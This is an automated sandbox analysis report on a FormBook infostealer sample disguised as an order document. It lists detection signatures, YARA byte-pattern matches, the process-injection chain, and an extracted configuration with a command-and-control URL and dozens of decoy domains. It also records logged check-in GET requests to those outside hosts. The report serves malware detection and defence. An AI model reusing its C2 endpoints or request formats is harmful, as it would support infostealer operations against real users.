Loading ...

Play interactive tourEdit tour

Analysis Report NEW ORDER ELO-05756485.exe

Overview

General Information

Sample Name:NEW ORDER ELO-05756485.exe
Analysis ID:383983
MD5:ef847f9fc2339b9470150fef1105b5fe
SHA1:eb9b2c97525c2b167d1ae4bdeba308f1c4d9206d
SHA256:9e54241184e45b1950037313896e0d2e864cc9d373f5a2f14b0af405094fd1a4
Tags:exeFormbookHostgator
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • NEW ORDER ELO-05756485.exe (PID: 6616 cmdline: 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe' MD5: EF847F9FC2339B9470150FEF1105B5FE)
    • NEW ORDER ELO-05756485.exe (PID: 6800 cmdline: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe MD5: EF847F9FC2339B9470150FEF1105B5FE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5048 cmdline: /c del 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dingolope.com/riai/"], "decoy": ["856380892.xyz", "goproteinz.com", "girigratis.com", "4schwuleautoren.com", "artofwrestlingicons.com", "miles4moms.com", "tamiigun.com", "noritamoneyconsultants.net", "blacklionllc.net", "elevictory.com", "happinessmail.com", "thymocide.net", "123goimmo.com", "advocate4deaf.com", "lovelyforum.net", "rentlondonapartment.com", "weinsureplanes.com", "tagfqjxf.icu", "thewellbeingsutra.com", "enibo-official.com", "gammacake.com", "flyingshiitake.com", "heryay.com", "myonlinereturns.com", "goodxweb.com", "soukefu.com", "stuntmemorabilia.net", "ourlivesinchristmatters.com", "capslock-europe.com", "trannghiason.com", "makeproductcool.com", "siezubehor.com", "architeizer.com", "smartwisecapital.info", "mybuildingneeds.com", "jumlasx.xyz", "theclevergoalie.com", "polvodeoro.com", "wheretofindmarina.com", "learningfitbit.com", "buyanijuan.com", "aplusdrilling.com", "dulcification-comforter.info", "bjkjrd.com", "dehaochu.com", "jaceandjenelle.com", "upperish.com", "asociadosresidenciales.com", "timedoesnote082703.xyz", "hackinson.com", "3d3366.com", "harringtonstoowoomba.com", "amandawilsonsolutions.com", "skipbinsplus.com", "plataformacampeao.com", "sleepasana.com", "pinupcasino-start.site", "chamosgt.com", "3pisbd.com", "yourbesttacolife.com", "synaptictalent.com", "controlservicesreport.com", "westrenworld.com", "watertomato.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x92880:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x92afa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xbf0a0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xbf31a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9e61d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xcae3d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x9e109:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xca929:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x9e71f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xcaf3f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x9e897:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xcb0b7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93512:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xbfd32:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x9d384:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xc9ba4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9420b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xc0a2b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xa448f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xd0caf:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xa5492:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.NEW ORDER ELO-05756485.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.NEW ORDER ELO-05756485.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.NEW ORDER ELO-05756485.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.jumlasx.xyz/riai/Avira URL Cloud: Label: malware
          Source: http://www.jumlasx.xyzAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.dingolope.com/riai/"], "decoy": ["856380892.xyz", "goproteinz.com", "girigratis.com", "4schwuleautoren.com", "artofwrestlingicons.com", "miles4moms.com", "tamiigun.com", "noritamoneyconsultants.net", "blacklionllc.net", "elevictory.com", "happinessmail.com", "thymocide.net", "123goimmo.com", "advocate4deaf.com", "lovelyforum.net", "rentlondonapartment.com", "weinsureplanes.com", "tagfqjxf.icu", "thewellbeingsutra.com", "enibo-official.com", "gammacake.com", "flyingshiitake.com", "heryay.com", "myonlinereturns.com", "goodxweb.com", "soukefu.com", "stuntmemorabilia.net", "ourlivesinchristmatters.com", "capslock-europe.com", "trannghiason.com", "makeproductcool.com", "siezubehor.com", "architeizer.com", "smartwisecapital.info", "mybuildingneeds.com", "jumlasx.xyz", "theclevergoalie.com", "polvodeoro.com", "wheretofindmarina.com", "learningfitbit.com", "buyanijuan.com", "aplusdrilling.com", "dulcification-comforter.info", "bjkjrd.com", "dehaochu.com", "jaceandjenelle.com", "upperish.com", "asociadosresidenciales.com", "timedoesnote082703.xyz", "hackinson.com", "3d3366.com", "harringtonstoowoomba.com", "amandawilsonsolutions.com", "skipbinsplus.com", "plataformacampeao.com", "sleepasana.com", "pinupcasino-start.site", "chamosgt.com", "3pisbd.com", "yourbesttacolife.com", "synaptictalent.com", "controlservicesreport.com", "westrenworld.com", "watertomato.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: NEW ORDER ELO-05756485.exeVirustotal: Detection: 37%Perma Link
          Source: NEW ORDER ELO-05756485.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: NEW ORDER ELO-05756485.exeJoe Sandbox ML: detected
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: NEW ORDER ELO-05756485.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: NEW ORDER ELO-05756485.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393394404.00000000012C0000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393394404.00000000012C0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.378250105.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393436003.00000000012F0000.00000040.00000001.sdmp, colorcpl.exe, 00000008.00000002.599409173.0000000004500000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NEW ORDER ELO-05756485.exe, colorcpl.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.378250105.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 23.82.149.10:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 23.82.149.10:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 23.82.149.10:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.dingolope.com/riai/
          Source: global trafficHTTP traffic detected: GET /riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls HTTP/1.1Host: www.gammacake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4ls HTTP/1.1Host: www.dehaochu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4ls HTTP/1.1Host: www.goproteinz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SEA-10US LEASEWEB-USA-SEA-10US
          Source: global trafficHTTP traffic detected: GET /riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls HTTP/1.1Host: www.gammacake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4ls HTTP/1.1Host: www.dehaochu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4ls HTTP/1.1Host: www.goproteinz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.gammacake.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.architeizer.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.architeizer.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.architeizer.com/riai/www.happinessmail.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.architeizer.comReferer:
          Source: explorer.exe, 00000003.00000000.355167796.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.controlservicesreport.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.controlservicesreport.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.controlservicesreport.com/riai/www.architeizer.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.controlservicesreport.comReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dehaochu.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dehaochu.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dehaochu.com/riai/www.goproteinz.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dehaochu.comReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dingolope.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dingolope.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dingolope.com/riai/www.pinupcasino-start.site
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.dingolope.comReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.elevictory.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.elevictory.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.elevictory.com/riai/www.skipbinsplus.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.elevictory.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gammacake.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gammacake.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gammacake.com/riai/www.dehaochu.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.gammacake.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.goproteinz.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.goproteinz.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.goproteinz.com/riai/www.thewellbeingsutra.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.goproteinz.comReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.happinessmail.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.happinessmail.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.happinessmail.com/riai/www.jumlasx.xyz
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.happinessmail.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.jumlasx.xyz
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.jumlasx.xyz/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.jumlasx.xyzReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.learningfitbit.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.learningfitbit.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.learningfitbit.com/riai/www.upperish.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.learningfitbit.comReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.pinupcasino-start.site
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.pinupcasino-start.site/riai/
